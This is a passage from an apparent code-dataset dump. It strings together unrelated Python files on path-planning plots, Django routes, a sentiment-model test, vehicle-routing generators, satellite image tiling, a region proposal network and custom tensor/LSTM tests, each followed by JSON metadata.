0.1\n \n is_inside = 0\n \n for i in range(0, len(occupied_positions_x)):\n \n ox = occupied_positions_x[i]\n oy = occupied_positions_y[i]\n \n if long_axis_y == True:\n is_inside = is_inside + is_inside_ellipse( point[0], point[1], ox, oy, radius1, rad )\n else:\n is_inside = is_inside + is_inside_ellipse( point[0], point[1], ox, oy, rad, radius1 )\n \n \n if is_inside > 0:\n # print(\"is_inside\")\n break\n else:\n if rad > 10:\n break\n else: \n radius2 = rad\n \n if long_axis_y == True: \n radiusx = radius1\n radiusy = radius2 \n else:\n radiusx = radius2\n radiusy = radius1 \n \n \n \n ellipse_x = point[0] + radiusx*cos(ts) \n ellipse_y = point[1] + radiusy*sin(ts) \n \n global_path_x, global_path_y = find_path(global_path_x, global_path_y, point[0] , point[1] , radiusx ,radiusy, N) \n \n plt.figure(dpi=300)\n plt.xlabel('x [m]')\n plt.ylabel('y [m]')\n plt.xlim([-1,12])\n plt.ylim([-1,12])\n plt.plot(global_path_x, global_path_y, 'g--')\n plt.plot(point[0], point[1],'bx')\n plt.plot(ellipse_x,ellipse_y,'b.', markersize = 1)\n plt.plot(occupied_positions_x,occupied_positions_y,'bo',markersize = 1)\n plt.pause(0.01)\n \n\n \n\n\n\n\n\n\n\n","sub_path":"March15/New Dev/dev_ref_formulation/other/Hope.py","file_name":"Hope.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"287208505","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.list, name='list'),\n path('post/', views.post, name='post'),\n path('regist', views.regist, name='regist'),\n path('report', views.report, name='report'),\n path('delete', views.delete, name='delete'),\n]\n","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207269306","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python\n\"\"\"\n/***************************************************************************\n *\n * Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved\n * @file: senta_predict_gpu.py\n * @date 2021/5/26 11:11 AM\n * @brief \n *\n **************************************************************************/\n\"\"\"\nimport paddlehub as hub\n\nsenta = hub.Module(name=\"senta_cnn\")\ntest_text = [\"这家餐厅很好吃\", \"这部电影真的很差劲\"]\nexpect0 = [{\n 'text': ['这家餐厅很好吃', '这部电影真的很差劲'],\n 'sentiment_label': 1,\n 'sentiment_key': 'positive',\n 'positive_probs': 0.7132,\n 'negative_probs': 0.2868\n}, {\n 'text': ['这家餐厅很好吃', '这部电影真的很差劲'],\n 'sentiment_label': 1,\n 'sentiment_key': 'positive',\n 'positive_probs': 0.7132,\n 'negative_probs': 0.2868\n}]\nresults0 = senta.sentiment_classify(\n texts=[test_text, test_text], use_gpu=True, batch_size=2)\n# print(results0)\nassert expect0 == results0\nexpect1 = {'positive': 1, 'negative': 0}\nresults1 = senta.get_labels()\nassert expect1 == results1\nresults2 = senta.get_vocab_path()\n","sub_path":"ce_cloud_models/PaddleHub/NLP/linux/scripts/hub_senta_cnn/senta_predict_gpu.py","file_name":"senta_predict_gpu.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22432886","text":"# 49. 
Write a program to read 'n'\n# different numbers and picks largest of them.\n\nn = int(input(\"Enter how many numbers you want to provide.\"))\nwhile n > 10:\n print(\"\\nTry any number less than 10.\")\n n = int(input(\"Enter again.\\n\"))\n\nlst = list()\ni = 1\nbig = 0\nfor i in range(1, n + 1):\n i = int(input(\"Enter number {}\\n\".format(i)))\n if i > big:\n big = i\nprint(\"\\n>>>> Largest number is\", big)","sub_path":"py_practice/Problem49.py","file_name":"Problem49.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"469215802","text":"from typing import List, Tuple, Dict\n\nimport numpy as np\n\nfrom geo.providers import fake_module\nfrom solvers.madrich.problems.mdvrp_demo.models import Storage, Job, Courier\nfrom solvers.madrich.problems.models import Window, Point, Matrix, Cost\nfrom solvers.madrich.tests.generators import generate_points\n\n\ndef generate_mdvrp(jobs: int, storages: int, couriers: int) -> Tuple[List[Storage], List[Courier], Dict[str, Matrix]]:\n pts = generate_points(jobs * storages + storages + 1, max_x=55.8, max_y=37.7, min_x=55.7, min_y=37.6)\n distance, travel_time = fake_module.get_matrix(pts, ['distance', 'travelTime'])\n matrix = Matrix('driver', distance, travel_time)\n\n points_list = []\n for i in range(len(pts)):\n points_list.append(Point(i, (pts[i][0], pts[i][1])))\n\n storages_list = []\n for i in range(storages):\n storage_id = f'storage_{i}'\n storages_list.append(Storage(\n name=f'storage_{i}',\n load=300,\n skills=['brains'],\n location=points_list[jobs * storages + i],\n work_time=Window((\"2020-10-01T10:00:00Z\", \"2020-10-01T20:00:00Z\")),\n unassigned_jobs=generate_jobs(points_list[i * jobs: (i + 1) * jobs], storage_id),\n assigned_jobs=[]\n ))\n\n couriers_list = []\n for i in range(couriers):\n start = end = points_list[-1]\n name = f'courier_{i}'\n cost = Cost(10., 0.5, 1.2)\n value = np.array([40, 80])\n skills = ['brains']\n max_distance = 1_000_000\n w = Window((\"2020-10-01T10:00:00Z\", \"2020-10-01T20:00:00Z\"))\n couriers_list.append(Courier(name, 'driver', cost, value, skills, max_distance, w, start, end, storages_list))\n\n return storages_list, couriers_list, {'driver': matrix}\n\n\ndef generate_jobs(points: List[Point], storage_id: str = '', delay=300) -> List[Job]:\n jobs = []\n\n for i, point in enumerate(points):\n job_id = f'{storage_id}_job_{i}'\n value = np.array([1, 2])\n skills = ['brains']\n w = Window((f\"2020-10-01T{10 + (i % 4)}:00:00Z\", f\"2020-10-01T{(12 + (i % 5))}:00:00Z\"))\n tw = [w]\n jobs.append(Job(job_id, delay, value, skills, point, tw))\n\n return jobs\n","sub_path":"solvers/madrich/problems/mdvrp_demo/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"81151383","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 14:33:58 2019\nModule for Image Processing\n\n@author: Arthur\n\"\"\"\nimport numpy as np\nimport cv2\nimport gdal\nfrom skimage import filters\nfrom skimage.transform import resize\nimport matplotlib.pyplot as plt\nimport os\n\ndef divide_image(ds, block_size, remove_size=50):\n band = ds.GetRasterBand(1)\n xsize = band.XSize\n ysize = band.YSize\n \n xblocks = int(np.ceil(xsize/block_size))\n yblocks = int(np.ceil(ysize/block_size))\n \n # If a block is just a small strip, then remove it\n if (xsize-block_size*(xblocks-1) < remove_size):\n xblocks 
-= 1\n        xsize = block_size*xblocks\n    if (ysize-block_size*(yblocks-1) < remove_size):\n        yblocks -= 1\n        ysize = block_size*yblocks\n    \n    print('The image is divided into {} blocks ({} x {}) of size {} x {}'.format(yblocks*xblocks,yblocks,xblocks,block_size,block_size))\n    return (ysize, xsize, yblocks, xblocks, block_size)\n\ndef make_part_plot(img, img_part, factor, n, m, blk):\n    img_small = Resize(img, factor)\n    cols, rows = img_small.shape[:2]\n    img_part[n*blk:n*blk+cols, m*blk:m*blk+rows] = img_small\n    return img_part\n\ndef make_partition(img_path, block_size, data_path, img_name, remove_size = 1000, factor = 50):\n    if not os.path.exists(data_path+'{}\\\\'.format(img_name)):\n        os.makedirs(data_path+'{}\\\\'.format(img_name))\n    # open the raster once: divide_image expects a gdal dataset (not a path)\n    # and returns five values, so the old six-value unpacking failed\n    ds = gdal.Open(img_path)\n    div_shape = divide_image(ds, block_size, remove_size)\n    ysize, xsize, yblocks, xblocks, block_size = div_shape\n    \n    blk = int(np.ceil(block_size/factor))\n    img_plot = np.zeros([yblocks*blk,xblocks*blk,3], dtype = np.uint8)\n    for n in range(yblocks):\n        for m in range(xblocks):\n            try:\n                img = read_image_part(img_path, div_shape, n, m, ds)\n                img_plot = make_part_plot(img, img_plot, factor, n, m, blk)\n            except ValueError:\n                print('Moving on to next block, since this block ({}, {}) is not part of the image'.format(n, m))\n    plot_partition(img_plot, blk, yblocks, xblocks, data_path+'{}\\\\'.format(img_name))\n\ndef plot_partition(img, block, yblocks, xblocks, data_path):\n    fig = plt.figure(figsize = (19, 10))\n    ax = fig.add_axes([0, 0, 1, 1])\n    scl = min(1250/img.shape[1], 750/img.shape[0])\n    img_RGB = cv2.cvtColor(np.uint8(img), cv2.COLOR_BGR2RGB)\n    ax.imshow(img_RGB, interpolation='bicubic')\n    block_plot_arr = np.arange(0,xblocks*block+1,block)\n    for line in block_plot_arr:\n        ax.plot([line,line],[0,yblocks*block],color='C1',lw=3*scl)\n    block_plot_arr = np.arange(0,yblocks*block+1,block)\n    for line in block_plot_arr:\n        ax.plot([0,xblocks*block],[line,line],color='C1',lw=3*scl)\n    for yb in range(yblocks):\n        for xb in range(xblocks):\n            ax.text(xb*block+0.1*block,yb*block+0.5*block,'{}, {}'.format(yb,xb),fontsize=10*scl,color='lime')\n    ax.set_yticklabels([])\n    ax.set_xticklabels([])\n    ax.axis('off')\n    plt.savefig(data_path+'Partition.png',bbox_inches = 'tight',pad_inches=0, dpi=300)\n\n
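# editor's sketch (not part of the original file): a minimal driver for the\n# helpers above; 'image.tif' and the output folder are hypothetical paths.\n#   ds = gdal.Open('image.tif')\n#   div_shape = divide_image(ds, block_size=1000)\n#   block = read_image_part('image.tif', div_shape, 0, 0, ds)   # BGR block (0, 0)\n#   PlotImage(block)\n\n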
def read_image_part(path, div_shape, n, m, ds):\n    ysize, xsize, yblocks, xblocks, block_size = div_shape\n    \n    begin_n = n*block_size\n    if n == yblocks-1:\n        end_n = ysize\n    else:\n        end_n = (n+1)*block_size\n    \n    begin_m = m*block_size\n    if m == xblocks-1:\n        end_m = xsize\n    else:\n        end_m = (m+1)*block_size\n    \n    block_cols = end_m - begin_m\n    block_rows = end_n - begin_n\n    \n    # np.uint8 is the dtype; the original np.uint(8) is just the scalar 8 and\n    # is not a valid dtype argument\n    R = np.array(ds.GetRasterBand(1).ReadAsArray(begin_m, begin_n, block_cols, block_rows), dtype = np.uint8)\n    G = np.array(ds.GetRasterBand(2).ReadAsArray(begin_m, begin_n, block_cols, block_rows), dtype = np.uint8)\n    B = np.array(ds.GetRasterBand(3).ReadAsArray(begin_m, begin_n, block_cols, block_rows), dtype = np.uint8)\n    img = np.zeros([B.shape[0],B.shape[1],3], np.uint8)\n    img[:,:,0] = B\n    img[:,:,1] = G\n    img[:,:,2] = R\n    \n    if np.all(img==255) or np.all(img==0):\n        raise ValueError('This block is not part of the image.')\n    return img\n\ndef ReadImagePartExtra(path, div_shape, n, m, extra, ds):\n    \"\"\"Returns image with extra boundary to the left and right\"\"\"\n    ysize, xsize, yblocks, xblocks, block_size = div_shape\n    \n    if m==0:\n        img = np.zeros([block_size,block_size+1*extra,3], dtype = np.uint8)\n        img[:,:,2] = np.array(ds.GetRasterBand(1).ReadAsArray(0, n*block_size, block_size+extra, block_size), dtype = np.uint8)\n        img[:,:,1] = np.array(ds.GetRasterBand(2).ReadAsArray(0, n*block_size, block_size+extra, block_size), dtype = np.uint8)\n        img[:,:,0] = np.array(ds.GetRasterBand(3).ReadAsArray(0, n*block_size, block_size+extra, block_size), dtype = np.uint8)\n        ext = np.zeros([block_size,extra,3], dtype = np.uint8)\n        img = np.uint8(np.concatenate((ext,img),axis=1))\n    elif m==xblocks-1:\n        img = np.zeros([block_size,block_size+1*extra,3], dtype = np.uint8)\n        img[:,:,2] = np.array(ds.GetRasterBand(1).ReadAsArray(m*block_size-extra, n*block_size, block_size+extra, block_size), dtype = np.uint8)\n        img[:,:,1] = np.array(ds.GetRasterBand(2).ReadAsArray(m*block_size-extra, n*block_size, block_size+extra, block_size), dtype = np.uint8)\n        img[:,:,0] = np.array(ds.GetRasterBand(3).ReadAsArray(m*block_size-extra, n*block_size, block_size+extra, block_size), dtype = np.uint8)\n        ext = np.zeros([block_size,extra,3], dtype = np.uint8)\n        img = np.uint8(np.concatenate((img,ext),axis=1))\n    else:\n        img = np.zeros([block_size,block_size+2*extra,3], dtype = np.uint8)\n        img[:,:,2] = np.array(ds.GetRasterBand(1).ReadAsArray(m*block_size-extra, n*block_size, block_size+2*extra, block_size), dtype = np.uint8)\n        img[:,:,1] = np.array(ds.GetRasterBand(2).ReadAsArray(m*block_size-extra, n*block_size, block_size+2*extra, block_size), dtype = np.uint8)\n        img[:,:,0] = np.array(ds.GetRasterBand(3).ReadAsArray(m*block_size-extra, n*block_size, block_size+2*extra, block_size), dtype = np.uint8)\n    \n    # Check if block is really part of image or just an empty block\n    if np.all(img==255) or np.all(img==0):\n        raise ValueError('This block is not part of the image.')\n    return np.uint8(img)\n\ndef ReadImageSpecific(path, x, y, cols, rows):\n    # The x- and y-coordinates determine the upper left corner of the image\n    ds = gdal.Open(path)\n    R = np.array(ds.GetRasterBand(1).ReadAsArray(x, y, cols, rows), dtype = np.uint8)\n    G = np.array(ds.GetRasterBand(2).ReadAsArray(x, y, cols, rows), dtype = np.uint8)\n    B = np.array(ds.GetRasterBand(3).ReadAsArray(x, y, cols, rows), dtype = np.uint8)\n    img = np.zeros([B.shape[0],B.shape[1],3], np.uint8)\n    img[:,:,0] = B\n    img[:,:,1] = G\n    img[:,:,2] = R\n    return img\n\ndef ShowImage(img, img_title = None):\n    \"Show image (input: BGR image) with opencv\"\n    if np.max(img)==1:\n        img = np.uint8(img*255)\n    else:\n        img = np.uint8(img)\n    img_resize = cv2.resize(img, (int(img.shape[1]/img.shape[0]*1000), 1000))\n    cv2.imshow(img_title, img_resize)\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n    \ndef PlotImage(img):\n    \"Show image (input: BGR image) with matplotlib\"\n    dim = len(img.shape)\n    if dim==3:\n        img = img[:,:,[2,1,0]]\n    my_dpi = 100\n    figsize = img.shape[1]/my_dpi, img.shape[0]/my_dpi\n    fig = plt.figure(figsize=figsize)\n    ax = fig.add_axes([0, 0, 1, 1])\n    if dim==2:\n        ax.imshow(img, cmap=plt.cm.gray)\n    else:\n        ax.imshow(img)\n    ax.set_yticklabels([])\n    ax.set_xticklabels([])\n    ax.axis('off')\n    plt.show()\n    cv2.waitKey(0)\n    plt.close()\n    \ndef Resize(img, factor, mask = None):\n    \"Resize image (and corresponding mask) without smoothing\"\n    new_shape_rows = img.shape[0] // factor\n    new_shape_cols = img.shape[1] // factor\n    img_resized = resize(img,(new_shape_rows, new_shape_cols),\n                         mode='edge',\n                         anti_aliasing=False,\n                         anti_aliasing_sigma=None,\n                         preserve_range=True,\n                         order=0)\n    if mask is not None:\n        mask_resized = resize(mask,(new_shape_rows, new_shape_cols),\n                         mode='edge',\n                         anti_aliasing=False,\n                         anti_aliasing_sigma=None,\n                         preserve_range=True,\n                         order=0)\n        return img_resized, mask_resized\n    return img_resized\n
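\n# editor's note (added, my reading of the docstring above): order=0 (nearest\n# neighbour) with anti_aliasing=False keeps integer label masks exact instead\n# of blending class values, e.g.\n#   small_img, small_mask = Resize(img, 4, mask)   # both shrunk 4x, labels intact\n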
\ndef Otsu(img, rev = False):\n    \"Finds threshold with Otsu's method and returns binary image\"\n    try:\n        val = filters.threshold_otsu(img)\n        if rev:\n            # Low intensity gets value True (white)\n            return img < val\n        else:\n            # High intensity gets value True (white)\n            return img > val\n    except ValueError:\n        return np.zeros_like(img, dtype=bool)\n    \ndef Normalize(x):\n    dim = len(x.shape)\n    axis = tuple(range(dim-1))\n    x -= x.mean(axis=axis)\n    x /= x.std(axis=axis)\n    return x\n\n# NOTE (editor): Normalize2 is byte-for-byte identical to Normalize above\ndef Normalize2(x):\n    dim = len(x.shape)\n    axis = tuple(range(dim-1))\n    x -= x.mean(axis=axis)\n    x /= x.std(axis=axis)\n    return x\n    \ndef CalcDistance(lat1, lon1, lat2, lon2):\n    lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n    dlon = lon2 - lon1\n    dlat = lat2 - lat1\n    a = np.sin(dlat / 2) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2) ** 2\n    c = 2 * np.arcsin(np.sqrt(a))\n    m = 1000 * 6371 * c\n    return m\n\ndef PixelSize(path):\n    src = gdal.Open(path)\n    gt = src.GetGeoTransform()\n    lon1 = gt[0] \n    lat1 = gt[3] \n    lon2 = gt[0] + gt[1]*src.RasterXSize\n    lat2 = gt[3] + gt[4]*src.RasterXSize\n    dist = CalcDistance(lat1,lon1,lat2,lon2)\n    ysize = dist/src.RasterXSize\n    lon2 = gt[0] + gt[2]*src.RasterYSize\n    lat2 = gt[3] + gt[5]*src.RasterYSize\n    dist = CalcDistance(lat1,lon1,lat2,lon2)\n    xsize = dist/src.RasterYSize\n    return xsize, ysize","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":9971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"344432682","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np \nfrom torch.autograd import Variable\n\n# NOTE (editor): cfg, ProposalLayer, AnchorTargetLayer and smooth_l1_loss are\n# expected to come from the surrounding Faster R-CNN project; they are not\n# defined in this snippet.\n\nclass RPN(nn.Module):\n    \"\"\"\n    region proposal network\n    \"\"\"\n    def __init__(self, din):\n        super(RPN,self).__init__()\n        self.din = din\n        self.anchor_scale = cfg.ANCHOR_SCALE\n        self.anchor_ratio = cfg.ANCHOR_RATIO\n        self.feat_stride = cfg.FEAT_STRIDE\n        # define the conv layer of RPN \n        self.RPN_CONV = nn.Conv2d(self.din, 512, 3, 1, 1, bias=True)\n        # define the foreground/background classification layer\n        self.nc_score_out = len(self.anchor_scale) * len(self.anchor_ratio) * 2\n        self.RPN_cls_score = nn.Conv2d(512, self.nc_score_out, 1, 1 ,0)\n        # define the anchor box coordinate-offset prediction layer\n        self.nc_bbox_out = len(self.anchor_scale) * len(self.anchor_ratio) * 4\n        self.RPN_bbox_pred = nn.Conv2d(512, self.nc_bbox_out, 1, 1, 0)\n        # define the proposal layer\n        self.RPN_proposal = ProposalLayer(self.feat_stride, self.anchor_scale,self.anchor_ratio)\n        # define the anchor-target matching layer\n        self.RPN_anchor_target = AnchorTargetLayer(self.feat_stride, self.anchor_scale, self.anchor_ratio)\n        self.rpn_loss_cls = 0\n        self.rpn_loss_box = 0\n    \n    @staticmethod\n    def reshape(x,d):\n        input_shape = x.size()\n        # the original dropped the return, so callers always got None\n        return x.view(\n            input_shape[0], ## batch_size\n            int(d), \n            int(float(input_shape[1] * input_shape[2])/float(d)),\n            input_shape[3]\n        )\n
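\n    # editor's sketch (inferred, not in the original file): reshape folds the\n    # 2*A fg/bg channels into pairs so softmax can run over one class axis,\n    # e.g. with A = 9 anchors:\n    #   (N, 18, H, W) -> reshape(x, 2)  -> (N, 2, 9*H, W)\n    #   F.softmax(..., 1)               -> per-anchor fg/bg probabilities\n    #   reshape(x, 18)                  -> back to (N, 18, H, W)\n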
\n    def forward(self, base_feat, im_info, gt_boxes, num_boxes):\n        batch_size = base_feat.size(0)\n        # first push the base feature map through the RPN's 3x3 conv\n        rpn_conv1 = F.relu(self.RPN_CONV(base_feat),inplace=True)\n\n        # rpn classification scores from the 1x1 conv\n        rpn_cls_score = self.RPN_cls_score(rpn_conv1)\n        # reshape the score tensor (the original passed the conv module itself)\n        rpn_cls_score_reshape = self.reshape(rpn_cls_score, 2)\n        # softmax over dim 1 turns the scores into probabilities\n        rpn_cls_prob_reshape = F.softmax(rpn_cls_score_reshape,1)\n        # fold back into per-anchor class probabilities\n        rpn_cls_prob = self.reshape(rpn_cls_prob_reshape, self.nc_score_out)\n        \n        # predict the anchor box offsets\n        rpn_bbox_pred = self.RPN_bbox_pred(rpn_conv1)\n        # proposal layer: extract candidate boxes\n        cfg_key = \"TRAIN\" if self.training else \"TEST\"\n        # the input to RPN_proposal's forward function is a 4-element tuple\n        rois = self.RPN_proposal((rpn_cls_prob.data, rpn_bbox_pred.data, im_info, cfg_key))\n\n        self.rpn_loss_cls = 0\n        self.rpn_loss_box = 0\n\n        # generate training labels and build the rpn loss\n        if self.training:\n            assert gt_boxes is not None\n            rpn_data = self.RPN_anchor_target((rpn_cls_score.data, gt_boxes, im_info, num_boxes))\n\n            # classification loss\n            rpn_cls_score = rpn_cls_score_reshape.permute(0,2,3,1).contiguous().view(batch_size, -1, 2)\n            rpn_label = rpn_data[0].view(batch_size, -1)\n\n            rpn_keep = Variable(rpn_label.view(-1).ne(-1).nonzero().view(-1))\n            rpn_cls_score = torch.index_select(rpn_cls_score.view(-1,2), 0, rpn_keep)\n            rpn_label = torch.index_select(rpn_label.view(-1), 0, rpn_keep.data)\n            rpn_label = Variable(rpn_label.data.long())\n            self.rpn_loss_cls = F.cross_entropy(rpn_cls_score, rpn_label)\n\n            fg_cnt = torch.sum(rpn_label.data.ne(0))\n\n            rpn_bbox_targets, rpn_bbox_inside_weights, rpn_bbox_outside_weights = rpn_data[1:]\n\n            # regression loss\n\n            rpn_bbox_inside_weights = Variable(rpn_bbox_inside_weights)\n            rpn_bbox_outside_weights = Variable(rpn_bbox_outside_weights)\n            rpn_bbox_targets = Variable(rpn_bbox_targets)\n\n            self.rpn_loss_box = smooth_l1_loss(rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights, \n                                                            rpn_bbox_outside_weights, sigma=3, dim=[1,2,3])\n        \n        return rois, self.rpn_loss_cls, self.rpn_loss_box\n","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"262599293","text":"from model.tensor_new import Tensor, LSTMCell, Embedding, CrossEntropyLoss, SGD, LSTMLayer, Linear, Layer, Sequential\nfrom model.vocab import Vocab, load_glove_emb\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as f\nfrom tqdm import tqdm\nimport time\n\n\ndef test_basic_ops(x: Tensor, y: Tensor):\n    print('x = ', x)\n    print('y = ', y)\n    print('x + y = ', x + y)\n    print('x.sigmoid = ', x.sigmoid())\n    print('x.tanh = ', x.tanh())\n    # print('x.softmax = ', x.softmax())\n    print('2 * x = ', Tensor(2) * x)\n    print('x * y = ', x * y)\n    print('x - y = ', x - y)\n    print('x - 2 = ', x - Tensor(2, device='cuda'))\n    print('x + 2 = ', x + Tensor(2, device='cuda'))\n    print('-x = ', -x)\n    print('x.sum = ', x.sum(0))\n    print('x.expand(0, 3) = ', x.expand(0, 3))\n    print('x.expand(1, 3) = ', x.expand(1, 3))\n\n\ndef test_mm():\n    # create x and y before they are used (the original referenced x before\n    # assignment, which raises UnboundLocalError)\n    x = Tensor(np.random.rand(1, 3).astype(np.float32), device='cuda')\n    y = Tensor(np.random.rand(3, 1).astype(np.float32), device='cuda')\n    x1 = x.expand(0, 3)\n    x2 = x.expand(1, 3)\n    print(x1.mm(x2))\n    print(x, y)\n    x_t = x.transpose()\n    y_t = y.transpose()\n    print(x_t.mm(y_t))\n    x = Tensor(np.random.rand(6), device='cuda')\n    y = Tensor(np.random.rand(6), device='cuda')\n    x.reshape((2, 3)).mm(y.reshape((3, 2)))\n\n\ndef test_backward():\n    x_np = np.random.rand(2, 3)\n    w_np = np.random.rand(3, 5)\n    print(x_np)\n    print(w_np)\n    x = Tensor(x_np, device='cuda', autograd=True)\n    w = Tensor(w_np, device='cuda', autograd=True)\n    res = (x - Tensor(1, d_type=np.float32, device='cuda', autograd=True)).mm(w)\n    print('res_cuda = ', res)\n    print('res_softmax = ', res.softmax())\n    loss = res.cross_entropy(Tensor([1, 2], device='cpu', d_type=np.int32))\n    print('loss_cuda = ', loss)\n    loss.backward()\n    print('x.grad = ', x.grad)\n    print('w.grad = ', w.grad)\n\n    # torch\n    print('-------------------------')\n    x_torch = torch.Tensor(x_np)\n    w_torch = torch.Tensor(w_np)\n    y_torch = 
torch.Tensor([1, 2])\n res_torch = (x_torch - 1).mm(w_torch)\n print('res_torch = ', res_torch)\n print('res_torch_softmax = ', f.softmax(res_torch, dim=1))\n loss_func = nn.NLLLoss()\n loss_torch = loss_func(f.softmax(res_torch, dim=1), y_torch.long())\n print('loss_torch', loss_torch)\n\n\ndef test_index_select():\n x_cpu = np.random.rand(10, 5)\n x = Tensor(x_cpu, device='cuda', autograd=True)\n indices = Tensor([1, 2, 3], device='cpu', d_type=np.int32)\n embs = x.index_select(indices)\n print(x)\n print(embs)\n # print(x_cpu[[1, 2, 3]])\n\n\ndef test_get_item():\n x_cpu = np.random.rand(10, 5, 5)\n x = Tensor(x_cpu, device='cuda')\n print(x[:, :, 1])\n\n\ndef test_lstm_cell():\n embeddings = Embedding.init(\n vocab_size=10,\n embedding_dim=5,\n device='cuda',\n autograd=True,\n )\n lstm_cell = LSTMCell(\n input_dim=5,\n hidden_dim=100,\n device='cuda',\n )\n print('weight before backward')\n print(embeddings.weight)\n\n x = embeddings(Tensor([[1, 2, 3],\n [2, 3, 4]], device='cpu'))\n print('x')\n print(x)\n hidden = None\n for time_step in x:\n _, hidden = lstm_cell(time_step, hidden=hidden)\n target = Tensor([3, 5, 2], device='cpu', d_type=np.int32)\n criterion = CrossEntropyLoss()\n optimizer = SGD(parameters=[\n *embeddings.get_parameters(),\n *lstm_cell.get_parameters(),\n ],\n lr=0.01,\n )\n loss = criterion(hidden[0], target)\n print('loss = ', loss)\n loss.backward()\n optimizer.step(zero=True)\n print('weight after backward')\n print(embeddings.weight)\n\n\ndef test_mm_graph():\n x = Tensor(np.random.rand(10, 4).astype(np.float32), device='cuda', autograd=True)\n y = Tensor(np.random.rand(4, 5).astype(np.float32), device='cuda', autograd=True)\n res = x.mm(y)\n print(f'x: {x.children}')\n print(f'y: {y.children}')\n print(f'res: {res.children}')\n\n\ndef test_lstm_layer():\n embeddings = Embedding.init(\n vocab_size=10,\n embedding_dim=5,\n device='cuda',\n autograd=True,\n )\n lstm = LSTMLayer(\n input_dim=5,\n hidden_dim=100,\n device='cuda',\n )\n h2o = Linear(\n n_inputs=100,\n n_outputs=10,\n bias=True,\n device='cuda',\n )\n criterion = CrossEntropyLoss()\n optimizer = SGD(parameters=[\n *embeddings.get_parameters(),\n *lstm.get_parameters(),\n *h2o.get_parameters(),\n ])\n print(len(optimizer.parameters))\n x = embeddings(Tensor([[1, 2, 3],\n [2, 3, 4]], device='cpu'))\n target = Tensor([3, 5, 2], device='cpu', d_type=np.int32)\n output = h2o(lstm(x)[0][-1])\n loss = criterion(input=output, target=target)\n loss.backward()\n print('embedding before backward')\n print(embeddings.weight)\n optimizer.step()\n print('--------------')\n print('embedding after backward')\n print(embeddings.weight)\n\n\nclass Model(Layer):\n def __init__(\n self,\n embedding,\n hidden_dim,\n output_dim,\n device='cuda',\n **kwargs,\n ):\n super(Model, self).__init__()\n self.device = device\n if embedding is not None:\n self.embedding = embedding\n self.embedding_dim = embedding.embedding_dim\n else:\n vocab_size = kwargs.get('vocab_size')\n embedding_dim = kwargs.get('embedding_dim')\n assert vocab_size is not None, 'vocab_size is required'\n assert embedding_dim is not None, 'embedding_dim is required'\n self.embedding_dim = embedding_dim\n self.embedding = Embedding.init(\n vocab_size=vocab_size,\n embedding_dim=embedding_dim,\n device=device,\n autograd=False,\n )\n\n self.lstm = LSTMLayer(\n input_dim=self.embedding_dim,\n hidden_dim=hidden_dim,\n device=device,\n )\n\n self.h2o = Linear(\n n_inputs=hidden_dim,\n n_outputs=output_dim,\n bias=True,\n device=device,\n )\n\n def forward(self, 
input):\n hs, _ = self.lstm(self.embedding(input=input))\n output = self.h2o(hs[-1])\n return output\n\n def __call__(self, input):\n return self.forward(input)\n\n\ndef test_build_model():\n model = Model(\n embedding=None,\n hidden_dim=300,\n output_dim=10,\n device='cuda',\n embedding_dim=300,\n vocab_size=10000,\n )\n\n x = Tensor([[*range(i, i + 20)] for i in range(20)], device='cpu')\n target = Tensor(np.random.randint(0, 10, 20), device='cpu', d_type=np.int32, autograd=True)\n\n criterion = CrossEntropyLoss()\n optimizer = SGD(parameters=model.get_parameters())\n for _ in tqdm(range(0, 10)):\n output = model(x)\n loss = criterion(output, target)\n t1 = time.time()\n loss.backward()\n t2 = time.time()\n print(f'time to backward loss: {t2 - t1}')\n\n t1 = time.time()\n optimizer.step()\n t2 = time.time()\n print(f'time to step: {t2 - t1}')\n # print('embedding before backward')\n # print(model.embedding.weight)\n # print('-------------------')\n # print('embedding after backward')\n # print(model.embedding.weight)\n\n\ndef test_vocab():\n user_vocab = Vocab(vocab_file='data/prediction/embeddings/user_vecs.vocab')\n print(f'user vocab length: {len(user_vocab)}')\n print([user_vocab[i] for i in range(5)])\n user_vectors = np.load('data/prediction/embeddings/user_vecs.npy')\n user_vectors = np.concatenate((np.zeros((2, user_vectors.shape[1]), dtype=np.float), user_vectors), axis=0)\n print(f'user vectors shape: {user_vectors.shape}')\n print('-' * 30)\n\n sub_vocab = Vocab(vocab_file='data/prediction/embeddings/sub_vecs.vocab')\n print(f'sub vocab length: {len(sub_vocab)}')\n print([sub_vocab[i] for i in range(5)])\n sub_vectors = np.load('data/prediction/embeddings/sub_vecs.npy')\n sub_vectors = np.concatenate((np.zeros((2, sub_vectors.shape[1]), dtype=np.float), sub_vectors), axis=0)\n print(f'sub vectors shape: {sub_vectors.shape}')\n print('-' * 30)\n\n words, word_vectors = load_glove_emb('data/prediction/embeddings/glove_word_embeds.txt')\n word_vectors = np.concatenate((np.zeros((2, word_vectors.shape[1]), dtype=np.float), 